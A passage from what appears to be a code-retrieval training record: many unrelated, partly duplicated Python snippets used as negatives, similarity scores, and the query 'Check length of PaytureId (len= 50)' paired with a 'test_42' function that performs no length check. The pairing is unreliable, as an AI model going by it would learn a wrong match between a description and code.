self.bank_transfer_iban = bank_transfer_iban", "def party_id(self):\n pass", "def test_validate_party_info_id_is_none(self):\n self.party_test_data[\"id\"] = None\n response = validate_party_info(self.party_test_data)\n self.assertDictEqual(\n response, {\"message\": \"id is required\", \"code\": 400})", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def __init__(self, payment_id, camper_id = '', camp_id = '', payment_date = '', paid_amount = ''):\r\n self.__payment_id__ = payment_id\r\n self.__camper_id__ = camper_id\r\n self.__camp_id__ = camp_id\r\n self.__payment_date__ = payment_date\r\n self.__paid_amount__ = paid_amount", "def unique_id(self):\r\n return f\"{DOMAIN}_{self.charge_point_id}_{self.connector_id}\"", "def emptyGroupementPk(heb):\n heb.heb_groupement_pk = None\n heb.update()", "def unique_id(self) -> str:\n return f\"{self.wallet_id}{self.WALLET_KEY_POSTFIX}\"", "def _set_unique_id(self, json_request):\n values = []\n for field in value_fields:\n value = json_request.get(field, '')\n values.append(quote(self.fully_decode_uri(value), safe=''))\n if len(values) == 1:\n self.unique_id = values[0]\n elif len(values) == 2:\n self.unique_id = self.build_summary(values[0], values[1])\n elif len(values) == 1:\n self.unique_id = self.build_summary(values[0], values[1], values[2])", "def __unicode__(self):\r\n return \"%d (%f)\" % (self.payment.pay_id, self.id)", "def get_dummy_id(self):\n return self._dummy_id", "def unique_id(self) -> str | None:\n return f\"{self._station_id}_{self._fuel_type}\"", "def null(cls):\n return GXBIGRID()", "def __init__(self, payor_id=None, payor_name=None, address=None, primary_contact_name=None, primary_contact_phone=None, primary_contact_email=None, funding_account_routing_number=None, funding_account_account_number=None, funding_account_account_name=None, kyc_state=None, manual_lockout=None, payee_grace_period_processing_enabled=None, payee_grace_period_days=None, collective_alias=None, support_contact=None, dba_name=None, allows_language_choice=None, reminder_emails_opt_out=None, language=None, includes_reports=None, max_master_payor_admins=None, transmission_types=None): # noqa: E501 # noqa: E501\n\n self._payor_id = None\n self._payor_name = None\n self._address = None\n self._primary_contact_name = None\n self._primary_contact_phone = None\n self._primary_contact_email = None\n self._funding_account_routing_number = None\n self._funding_account_account_number = None\n self._funding_account_account_name = None\n self._kyc_state = None\n self._manual_lockout = None\n self._payee_grace_period_processing_enabled = None\n self._payee_grace_period_days = None\n self._collective_alias = None\n self._support_contact = None\n self._dba_name = None\n self._allows_language_choice = None\n self._reminder_emails_opt_out = None\n self._language = None\n self._includes_reports = None\n self._max_master_payor_admins = None\n self._transmission_types = None\n self.discriminator = None\n\n if payor_id is not None:\n self.payor_id = payor_id\n self.payor_name = payor_name\n if address is not None:\n self.address = address\n if primary_contact_name is not None:\n self.primary_contact_name = primary_contact_name\n if primary_contact_phone is not None:\n self.primary_contact_phone = primary_contact_phone\n if primary_contact_email is not None:\n self.primary_contact_email = primary_contact_email\n if funding_account_routing_number is not None:\n self.funding_account_routing_number = funding_account_routing_number\n if funding_account_account_number is not None:\n self.funding_account_account_number = funding_account_account_number\n if funding_account_account_name is not None:\n self.funding_account_account_name = funding_account_account_name\n if kyc_state is not None:\n self.kyc_state = kyc_state\n if manual_lockout is not None:\n self.manual_lockout = manual_lockout\n if payee_grace_period_processing_enabled is not None:\n self.payee_grace_period_processing_enabled = payee_grace_period_processing_enabled\n if payee_grace_period_days is not None:\n self.payee_grace_period_days = payee_grace_period_days\n if collective_alias is not None:\n self.collective_alias = collective_alias\n if support_contact is not None:\n self.support_contact = support_contact\n if dba_name is not None:\n self.dba_name = dba_name\n if allows_language_choice is not None:\n self.allows_language_choice = allows_language_choice\n if reminder_emails_opt_out is not None:\n self.reminder_emails_opt_out = reminder_emails_opt_out\n if language is not None:\n self.language = language\n if includes_reports is not None:\n self.includes_reports = includes_reports\n if max_master_payor_admins is not None:\n self.max_master_payor_admins = max_master_payor_admins\n if transmission_types is not None:\n self.transmission_types = transmission_types", "def test_id_no_value(self):\n self.line._parse_event_swimmer_id(\" \")\n self.assertEqual(None, self.line.event_swimmer_id)", "def _generate_uuid_str_if_none(given_uuid):\n\t\treturn given_uuid or uuid.uuid4().__str__()", "def _prepare_invoice(self):\n self.ensure_one()\n result = super(SaleOrder, self)._prepare_invoice()\n result.update({\n 'cost_center_id': self.cost_center_id and self.cost_center_id.id or False\n })\n return result", "def get_id(self) -> Optional[str]:\n return self.id_", "def payor_id(self, payor_id):\n\n self._payor_id = payor_id", "def test_id_type_none(self):\n obj = Base(None)\n self.assertTrue(obj.id is 1)", "def testIdReturn(self):\n self.assertEqual(\n 'uniqueId',\n self.cc.id\n )", "def reqid(self) -> str:", "def reqid(self) -> str:", "def test_id_no_value(self):\n self.line._parse_team_swimmer_id(\" \")\n self.assertEqual(None, self.line.team_swimmer_id)", "def unique_id(self):\n return f\"octopus_energy_intelligent_charge_limit\"", "def _default_value(self):\n return None", "def id(self) -> Optional[str]:\n return pulumi.get(self, \"id\")", "def id(self) -> Optional[str]:\n return pulumi.get(self, \"id\")", "def id(self) -> Optional[str]:\n return pulumi.get(self, \"id\")", "def id(self) -> Optional[str]:\n return pulumi.get(self, \"id\")", "def id(self) -> Optional[str]:\n return pulumi.get(self, \"id\")", "def id(self) -> Optional[str]:\n return pulumi.get(self, \"id\")", "def test_pay_for_nothing(self):\n res = self.do_get_basket()\n self.assertEqual(res.status_code, 200)\n basket_id = res.data['id']\n\n data = {\n \"guest_email\": \"herp@example.com\",\n \"basket\": reverse('basket-detail', args=[basket_id]),\n \"shipping_address\": {\n \"first_name\": \"fadsf\",\n \"last_name\": \"fad\",\n \"line1\": \"234 5th Ave\",\n \"line4\": \"Manhattan\",\n \"postcode\": \"10001\",\n \"state\": \"NY\",\n \"country\": reverse('country-detail', args=['US']),\n \"phone_number\": \"+1 (717) 467-1111\",\n }\n }\n url = reverse('cybersource-sign-auth-request')\n res = self.client.post(url, data, format='json')\n self.assertEqual(res.status_code, 406)", "def unique_id(self) -> str:\n return self.get_unique_id(wallet=self.wallet_id, nonce=self.nonce)", "def generated_data_id(self) -> Optional[str]:\n return self._generated_data_id", "def compute_transaction_id(self):\n self.tx_id = self.get_sign_data()", "def get_unique_id(cls, wallet: str, nonce: Optional[str]) -> str:\n if nonce:\n return f\"{wallet}_{nonce}{cls.TRANSACTION_KEY_POSTFIX}\"\n else:\n return f\"{wallet}{cls.TRANSACTION_KEY_POSTFIX}\"", "def test_uuid_default(self):\r\n default = uuid.uuid4()\r\n prop = UUID(default=default, required=True)\r\n self.assertEqual(prop.to_database(None), prop.to_database(default))", "def test_missingId(self):\n node = Node()\n node.properties[\"datawire_nodeId\"] = \"4567\"\n self.assertEqual(node.getId(), \"4567\")", "def test_post_cve_id_no_params(reg_user_headers):\n res = requests.post(\n f'{env.AWG_BASE_URL}{CVE_ID_URL}',\n headers=reg_user_headers\n )\n assert res.status_code == 400\n response_contains(res, 'amount')\n response_contains(res, 'cve_year')\n response_contains(res, 'short_name')", "def onchange_invoice_id(self):\n # self.invoice_id = False\n # self.base_amount = 0.0\n # self.wh_src_rate = 5.0\n if self._context is None:\n context = {}\n res = {}\n inv_obj = self.env['account.invoice']\n if not self.invoice_id:\n return {'value': {\n 'invoice_id': False,\n 'base_amount': 0.0,\n 'wh_src_rate': 0.0,\n 'wh_amount': 0.0, }\n }\n\n inv_brw = inv_obj.browse(self.invoice_id.id)\n base_amount = self.base_amount or inv_brw.amount_untaxed\n wh_src_rate = self.wh_src_rate or inv_brw.wh_src_rate or 5.0\n wh_amount = base_amount * wh_src_rate / 100.0\n res = {'value': {\n 'base_amount': base_amount,\n 'wh_src_rate': wh_src_rate,\n 'wh_amount': wh_amount,\n }\n }\n return res", "def fill_missing_parameters(self):\n pseudo_id = self.get_param_by_type(PseudoID)\n pseudo_name = self.get_param_by_type(PseudoName)\n if pseudo_id is None and pseudo_name is not None:\n self.parameters.append(\n PseudoID(pseudo_name.value)\n ) # take name for both\n elif pseudo_name is None and pseudo_id is not None:\n self.parameters.append(\n PseudoName(pseudo_id.value)\n ) # take id for both", "def pure_id(self):\n return self._pure_id", "def test_serialize_none(self):\n self.assertEqual(serialize(None), 'null')", "def add_default_params(self, params):\n params['key'] = self.key\n params['format'] = self.format\n #params['unique_id'] = generate_unique_id()\n return params", "def unique_id(self):\n return f\"octopus_energy_gas_{self._serial_number}_{self._mprn}_previous_accumulative_cost_override_tariff\"", "def get_primary_id(self):", "def get_prep_value(self, value):\n if (value is UNKNOWN) or (value is ''):\n # If Django tries to save an empty string, send the db None (NULL).\n return None\n else:\n # Otherwise, just pass the value.\n return value", "def unique_id(self) -> Optional[str]:\n return self._device.device_id", "def get_or_create_unique_id(self):\n if not self.unique_id:\n self.unique_id = uuid.uuid4().hex\n return self.unique_id", "def identity_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"identity_id\")", "def identity_id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"identity_id\")", "def id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"id\")", "def id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"id\")", "def id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"id\")", "def id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"id\")", "def id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"id\")", "def id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"id\")", "def id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"id\")", "def id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"id\")", "def id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"id\")", "def id(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"id\")" ]
[ "0.5814802", "0.57321626", "0.5561772", "0.54671985", "0.5423538", "0.5402264", "0.5338469", "0.5287139", "0.5287139", "0.5287139", "0.5248321", "0.5226516", "0.5212841", "0.514347", "0.512409", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.51076347", "0.50907475", "0.5085691", "0.50814104", "0.5066625", "0.50645024", "0.50641996", "0.50521195", "0.50521076", "0.5001981", "0.49948782", "0.4993409", "0.4986245", "0.4971573", "0.49589494", "0.49538484", "0.4949099", "0.49467346", "0.49392086", "0.49392086", "0.49390846", "0.49321082", "0.49203447", "0.4892771", "0.4892771", "0.4892771", "0.4892771", "0.4892771", "0.4892771", "0.4881849", "0.48815697", "0.48766047", "0.48673418", "0.4865086", "0.48466253", "0.4836276", "0.48348296", "0.4833271", "0.48303524", "0.48281577", "0.48223674", "0.48144472", "0.48110402", "0.48003095", "0.4799207", "0.47953835", "0.47943953", "0.47870758", "0.47870758", "0.4784037", "0.4784037", "0.4784037", "0.4784037", "0.4784037", "0.4784037", "0.4784037", "0.4784037", "0.4784037", "0.4784037" ]
0.0
-1
Check length of PaytureId (len= 50)
def test_42(self): assert 'True' == Api.requestBlock('test-42')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def validateID(id):\n\n if re.compile('[0-9]+').match(id) == None:\n output.completeOutputError(InvalidArgumentCount(descape =\"'%s' is not a valid Id. ID should be numeric with Length = '%s' \" \n\t\t\t% (id, lib.constants._ATTR_ID_LENGHT)))\n return -1\n else:\n # Check for the lenght \n counter = 0\n for char in id:\n counter += 1\n print counter , lib.constants._ATTR_ID_LENGHT\n if counter > lib.constants._ATTR_ID_LENGHT :\n output.completeOutputError(InvalidArgumentCount(descape =\"'%s' exceeded the given length i.e Max Length = '%s'\" % \n\t\t\t(id, lib.constants._ATTR_ID_LENGHT)))\n return -1\n else:\n return 0\n return 0", "def test_get_shortuuid_specific_length(self):\n id = get_shortuuid(length=10)\n self.assertTrue(len(id) == 10)", "def check_len( string_key ) : \r\n\r\n if len( string_key ) != 4 :\r\n\r\n raise Eggog( \"'%s': EGI wants the key to be exactly four characters!\" % (string_key, ) ) \r\n \r\n else :\r\n \r\n return True", "def validate_uuid(self, uuid_to_check):\r\n if re.fullmatch(BASE62_REGEX, uuid_to_check):\r\n return 20 <= len(uuid_to_check) <= 22\r\n else:\r\n return False", "def checkLength(ish, length):\n if ish == \"Visa\":\n ok = (13,16)\n elif ish == \"American Express\":\n ok = (15,)\n elif ish == \"MasterCard\":\n ok = (16,)\n elif ish == \"Discover/Novus\":\n ok = (16,)\n else:\n raise TypeError, \"unknown issuer\"\n return length in ok", "def payment_id_lengths(self) -> Set[int]:", "def payment_id_leading(self) -> bool:", "def max_length(verifield, required):\n if verifield is None: return True\n return len(verifield) <= required", "def confirm_resdic_chainid_length(params):\n resdic_params = (p for p in params if p.startswith('resdic_'))\n for param in resdic_params:\n chainid = param.split('_')[-1]\n if len(chainid) > 1:\n raise ValueError(\n f\"We found the parameter {param!r} which has \"\n \"more than one character in the chain \"\n \"identifier. Chain IDs should have only one character.\"\n )", "def checkValidId(self, id, prep_id = False):\n # RRD docs say that limit on vnames is 255 characters and that\n # A-Za-z0-9_ are the valid characters. Zenoss reserves - for it's own\n # use. Limiting to 200 instead just to leave room for whatever.\n # http://oss.oetiker.ch/rrdtool/doc/rrdgraph_data.en.html\n if len(id) > 200:\n return 'GraphPoint names can not be longer than 200 characters.'\n allowed = set(string.ascii_letters + string.digits + '_')\n attempted = set(id)\n if not attempted.issubset(allowed):\n return 'Only letters, digits and underscores are allowed' + \\\n ' in GraphPoint names.'\n return ZenModelRM.checkValidId(self, id, prep_id)", "def __len__(self):\n return len(self.token2id)", "def LengthTest(arr):\n\tif len(arr) == 8:\n\t\treturn True;\n\telif len(arr) == 7:\n\t\treturn IsMissingField('cid', arr)\n\telse:\n\t\treturn False", "def test_length(self):\n form_data = self.form_data('c897B$eH@')\n form = self.form(data=form_data, user=self.u)\n self.assertFalse(form.is_valid())", "def check_length(length):\n if length > lengthLimit:\n err_str = \"The length value (%s) is higher than the \" % (length)\n err_str += \"limit length (%s)\" % (lengthLimit)\n raise ValueError(err_str)", "def isValid(t_id):\n\tstr_id=str(t_id).strip()\n\treturn str_id.isdigit()", "def test_length(self):\n for length in range(2, 30):\n self.assertEqual(len(generate_password(length)), length)", "def test_invalid_numeric_code_length_format(self, cred, sender_id):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'sender_id': sender_id})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '3'\n assert resp.json()['error_text'] == parameter_is_too_long_msg.format('sender_id')", "def test_valid_code_length_format(self, cred, sender_id):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'sender_id': sender_id})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '0'\n request_id = resp.json()['request_id']\n # terminate verification process\n assert 'Workflow terminated' in \\\n terminate_workflow(cred[0], cred[1], request_id).json()['error_text']", "def validate_crx_id(crx_id):\n try:\n assert isinstance(crx_id, str)\n assert crx_id.isalnum()\n assert len(crx_id) == 32\n except AssertionError:\n raise MalformedExtId", "def checkValidId(self, id, prep_id = False):\n new_id = unquote(id)\n if prep_id: new_id = self.prepId(id)\n try:\n globalCheckValidId(self, new_id)\n return True\n except Exception:\n return str(sys.exc_info()[1])", "def is_valid(self):\n if len(self) <= 64 and re.match(RE_VALID_UID, self):\n return True\n\n return False", "def test_get_shortuuid_uuid(self):\n id = get_shortuuid()\n self.assertTrue(len(id) == 22)", "def bad_substring_check_account(self, google_ads_account_id):\n pass", "def test_rfc_nickkey_length(s):\n assert len(util.rfc_nickkey(s)) == len(s)", "def test_valid_code_length_format(self, cred, code_length):\n resp = requests.get(verify_url.format('json', cred[0], cred[1],\n 'TestApp', test_number), params={'code_length': code_length})\n assert resp.status_code == 200\n assert resp.headers['Content-Type'] == 'application/json'\n assert resp.json()['status'] == '0'\n request_id = resp.json()['request_id']\n # terminate verification process\n assert 'Workflow terminated' in \\\n terminate_workflow(cred[0], cred[1], request_id).json()['error_text']", "def validateIOmoduleId(output ,arg_dict , key):\n id = arg_dict[key]\n counter = 0\n for char in id:\n counter += 1\n if re.compile('[0-9]+').match(char[0]) == None:\n output.completeOutputError(InvalidArgumentCount(descape =\"'%s'='%s' is not a valid Id. \\n ID should be numeric \" % (key,id))) \n return None\n if counter > lib.constants._ATTR_ID_LENGHT:\n output.completeOutputError(InvalidArgumentCount(descape =\"'%s'='%s' is not a valid Id. \\n ID should be numeric with Length = '%s' \" % (key,id, lib.constants._ATTR_ID_LENGHT)))\n return None\n return arg_dict", "def len12(self, len): # -> None:\n ...", "def _check_subject_id(subject_id):\n if (subject_id and\n len(subject_id) > models.Subject.id.property.columns[\n 0].type.length):\n raise exception.SubjectNotFound()", "def vet_pdb_id(pdbid):\n if len(pdbid) < 4 or not \\\n pdbid.isalnum() or not \\\n re.match(r'^[0-9][A-Za-z0-9]{3}$', pdbid):\n return False\n return True", "def test_has_correct_length(self) -> None:\n assert len(list(ccc.CompoundingConversationDataset())) == 131569", "def validateVfabric(output ,arg_dict, key):\n id = arg_dict[key]\n counter = 0\n for char in id:\n counter += 1\n if re.compile('[0-9]+').match(char[0]) == None:\n output.completeOutputError(InvalidArgumentCount(descape =\"'%s' = '%s' is not a valid Id. ID should be numeric \" % \n\t\t\t\t(key,id)))\n return None\n if counter > lib.constants._ATTR_ID_LENGHT:\n\t output.completeOutputError(InvalidArgumentCount(descape =\"'%s'='%s' is not a valid Id. \\n ID should be numeric with Length = '%s' \" % (key,id, lib.constants._ATTR_ID_LENGHT)))\n return None\n return arg_dict", "def check_id(self, id):", "def id_check(employee_id):\r\n# badge_pattern = re.compile('[A-Za-z]{2}-\\d{4}')\r\n# re.search(badge_pattern, employee_id)\r\n\r\n # if statement\r\n if not re.match('[A-Z]{2}-\\d{4}', employee_id):\r\n print(employee_id, 'is not a valid ID.')", "def _validate_bbg_id(x):\n return len(x) == 12 and x[:3] == 'BBG' and str.isalnum(x[3:11]) and sum(map(\n lambda u: u in ['A', 'E', 'I', 'O', 'U'], x[3:11])) == 0 and str.isdigit(x[11])", "def _check_max_length(self, p: list) -> bool:\n\n return (\n len(p[0].split(\" \")) < self.max_length\n and len(p[1].split(\" \")) < self.max_length\n )", "def test_40_phonenumbers_too_long(self):\n number_phone = self.samples[4]\n with self.assertRaises(osv.except_osv):\n self.pn._symbol_set_char(number_phone)", "def test_client_ip_max_length(self):\n request = Request.objects.get(id=1)\n max_length = request._meta.get_field('client_ip').max_length\n self.assertEquals(max_length, 100)", "def check_string_length(string):\n if len(string) > 255:\n sys.exit(\"ERROR: Max permitted string length is 255\")", "def test_client_email_max_length(self):\n request = Request.objects.get(id=1)\n max_length = request._meta.get_field('client_email').max_length\n self.assertEquals(max_length, 100)", "def length_of_name(self, name):\n length = len(name)\n if length > 10:\n self.show_message_when_name_very_long()\n return length", "def generate_id(length: int = 8):\n return \"\".join(random.choices(string.ascii_uppercase, k=length))", "def _validate_length(data, min, max, err): # lint-amnesty, pylint: disable=redefined-builtin\n if len(data) < min or len(data) > max:\n raise errors.AccountDataBadLength(err)", "def checkPacketLength(self):\n return self.packetLength == len(self) - PRIMARY_HEADER_BYTE_SIZE - 1", "def min_length(verifield, required):\n if verifield is None: return True\n return len(verifield) >= required", "def invalid_caterpillar_length(length):\n try:\n length = int(length)\n except ValueError:\n return \"`caterpillar-length` must be something that can be cast to an `int`\"\n\n if not 1 <= length <= len(app.desk.indeces):\n return (\n \"`caterpillar-length` must be a number between \"\n f\"1 and {len(app.desk.indeces)}\"\n )\n\n return False", "def simple_validator(passport):\n if len(passport) == 8:\n return True\n if len(passport) == 7 and \"cid\" not in passport:\n return True\n return False", "def validate_kf_id(kf_id, prefix='TA'):\n if len(kf_id) != 11 or kf_id[:3] != prefix+'_':\n abort(400, f\"'{kf_id}' is not a valid kf_id\")", "def is_name_length_valid(self) -> bool:\n return 2 < len(self.app_name) <= 35", "def _validate_length(self, value):\n return (self.maximum_length is None) or (len(value) <= self.maximum_length)", "def _matchLength(self, length: int):\n return self._comparator['Length'] < length", "def test_longest_id(self):\r\n ids = \\\r\n \"R27DLI_4812 R27DLI_600 R27DLI_727 U1PLI_403 U1PLI_8969\".split(\r\n )\r\n seqs = dict(parse_fasta(dna_seqs.splitlines(),\r\n label_to_name=label_to_name))\r\n self.assertEqual(longest_id(ids, seqs), 'U1PLI_403')", "def test_split_id_otp(self):\n public_id, otp, = pyhsm.yubikey.split_id_otp(\"ft\" * 16)\n self.assertEqual(public_id, '')\n self.assertEqual(otp, \"ft\" * 16)\n\n public_id, otp, = pyhsm.yubikey.split_id_otp(\"cc\" + \"ft\" * 16)\n self.assertEqual(public_id, 'cc')\n self.assertEqual(otp, \"ft\" * 16)", "def test_maxlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'license_plate': 'AF8934'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': '123456'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF893'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF8-934'}\n self.assertFalse(val.validate(document))\n\n document = {'license_plate': 'AF 934'}\n self.assertFalse(val.validate(document))", "def fill_id(id):\n if len(str(id)) < 7:\n length = len(str(id))\n id = \"0\"*(7 - length) + str(id)\n return str(id)", "def test_has_correct_length(self) -> None:\n assert len(list(ccc.ConversationDataset())) == 7168", "def is_id_valid(id_code: str) -> bool:\n if is_valid_gender_number(int(id_code[0:1])):\n if is_valid_year_number(int(id_code[1:3])):\n if is_valid_month_number(int(id_code[3:5])):\n if is_valid_day_number(int(id_code[0:1]), int(id_code[1:3]), int(id_code[3:5]), int(id_code[5:7])):\n if is_valid_birth_number(int(float(id_code[7:10]))):\n if is_valid_control_number(id_code):\n return True\n else:\n return False\n else:\n return False\n\n else:\n return False\n else:\n return False\n else:\n return False", "def validateId(shortId):\n return shortId in [DockerUtil.getShortId(container) for container in DOCKER_CLIENT.containers.list()]", "def randid(length=12):\n\timport random\n\treturn ''.join(random.choice('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789') for x in range(length))", "def validate_length(string):\n if len(string) > 110:\n raise ValidationError('Tweet must be less than 110 characters')", "def is_id_valid(id_code: str) -> bool:\n if id_code.isdigit():\n if len(str(id_code)) == 11:\n id_code = str(id_code)\n gender_number = int(id_code[0:1])\n day = int(id_code[5:7])\n month = int(id_code[3:5])\n year = id_code[1:3]\n birth_number = id_code[7:10]\n if is_valid_gender_number(gender_number) \\\n and is_valid_year_number(int(year)) \\\n and is_valid_month_number(int(month)) \\\n and is_valid_day_number(gender_number, int(year), int(month), int(day)) \\\n and is_valid_birth_number(int(birth_number)) \\\n and is_valid_control_number(str(id_code)):\n return True\n return False\n return False\n return False", "def verify_length(src_json):\n error: str = \"\"\n if len(src_json.get(\"LedGroups\", [])) == 0:\n error = \"No or empty LedGroups\"\n if len(src_json.get(\"Sequencers\", [])) == 0:\n error = \"No or empty Sequencers\"\n return error", "def validate_identifier(identifier: str) -> bool:\n if identifier[:2] == 'NR':\n return True\n\n if len(identifier) < 9:\n return False\n\n try:\n d = int(identifier[-7:])\n if d == 0:\n return False\n except ValueError:\n return False\n # TODO This is not correct for entity types that are not Coops\n if identifier[:-7] not in ('CP', 'XCP', 'BC'):\n return False\n\n return True", "def validate_passport_id(passport_id: str) -> None:\n if RE_PID.match(passport_id) is None:\n raise ValueError(\"Passport ID is not nine decimal digits\")", "def check_length(string):\n if 6 < len(string) < 12:\n return True\n\n print(\"Your password is not between 6 and 12 characters\")\n return False", "def validVarConstructLength(self,varlen):\r\n if len(varlen)!=2:\r\n print 'variable must specify name and type'\r\n return False\r\n else:\r\n return True", "def test_check_name_is_3_parts():\n check_name_length()", "def mobile_len_validator(mobile):\n if len(mobile) != 13:\n raise ValidationError('Invalid mobile len')", "def validate_identifier(self, identifier):\n pass", "def test_uid_max_length(self):\n\n field = self.image._meta.get_field(\"uid\")\n self.assertEqual(field.max_length, 64)", "def is_valid_node_id(val):\n if not val:\n return False\n if not isinstance(val, bytes) and not isinstance(val, bytearray):\n return False\n\n length = len(val)\n if length != SHA1_BIN_LEN and length != SHA2_BIN_LEN and \\\n length != SHA3_BIN_LEN:\n return False\n\n return True", "def validateSN(self, ked):\n sn = ked[\"s\"]\n if len(sn) > 32:\n raise ValidationError(\"Invalid sn = {} too large for evt = {}.\"\n \"\".format(sn, ked))\n try:\n sn = int(sn, 16)\n except Exception as ex:\n raise ValidationError(\"Invalid sn = {} for evt = {}.\".format(sn, ked))\n\n return sn", "def _checkResponseByteCount(payload):\n POSITION_FOR_GIVEN_NUMBER = 0\n NUMBER_OF_BYTES_TO_SKIP = 1\n\n _checkString(payload, minlength=1, description='payload')\n\n givenNumberOfDatabytes = ord(payload[POSITION_FOR_GIVEN_NUMBER])\n countedNumberOfDatabytes = len(payload) - NUMBER_OF_BYTES_TO_SKIP\n\n if givenNumberOfDatabytes != countedNumberOfDatabytes:\n errortemplate = 'Wrong given number of bytes in the response: {0}, but counted is {1} as data payload length is {2}.' + \\\n ' The data payload is: {3!r}'\n errortext = errortemplate.format(givenNumberOfDatabytes, countedNumberOfDatabytes, len(payload), payload)\n raise ValueError(errortext)", "def test__limit_string_length(string, max_length):\n return limit_string_length(string, max_length)", "def check_len(password_length, alphabet_length, numb_length, symb_length):\r\n return (symb_length + alphabet_length + numb_length) == password_length", "def max_length(length):\n def validate(value):\n if len(value) <= length:\n return True\n raise Exception('%s must be at most %s characters long' % length)\n return validate", "def __init__(self, length=DEFAULT_ID_LENGTH, excluded_chars=DEFAULT_EXCLUDED_CHARS):\n self.id_length = length\n self.excluded_chars = excluded_chars", "def test_get_length_of_canonical_transcript(self):\n assert self.icd.get_length_of_canonical_transcript(\"ENSG00000171448\") == 4441\n assert self.icd.get_length_of_canonical_transcript(\"ENSG00000140157\") == 3225", "def is_id(string):\n regex = re.compile('[0-9a-f]{32}\\Z', re.I)\n if bool(regex.match(string)):\n return True\n\n return False", "def _validate_string_max_length(self, value):\n if self.max_length is not None:\n return len(str(value)) <= self.max_length\n else:\n return True", "def len23(self, len): # -> None:\n ...", "def _create_finding_id(control_id, resource_name, length=20):\n input = control_id + resource_name\n hex = hashlib.sha256(input.encode('UTF-8')).hexdigest()\n result = int(hex, 16) % (10 ** length)\n return str(result)", "def is_valid_pci_class_id(id):\n val = id.replace('0x', '').strip()\n if not is_valid_hex(id):\n return False\n if (len(val) > 6):\n return False\n return True", "def is_valid_passport_id(passport_id: int) -> bool:\n return len(passport_id) == 9 and passport_id.isnumeric()", "def at_least(length:int) -> str:\n return f\"{{{length},}}\"", "def exactly(length:int) -> str:\n return f\"{{{length}}}\"", "def check_id(id):\n id = id.strip()\n \n if id and id.isdigit(): # id must only be a number\n return id\n else:\n return None", "def _check_id(self, keyword):\n if keyword not in self.request.data:\n return '{} parameter is missing'.format(keyword)\n \"\"\" Check if <keyword> parameter is not None \"\"\"\n if 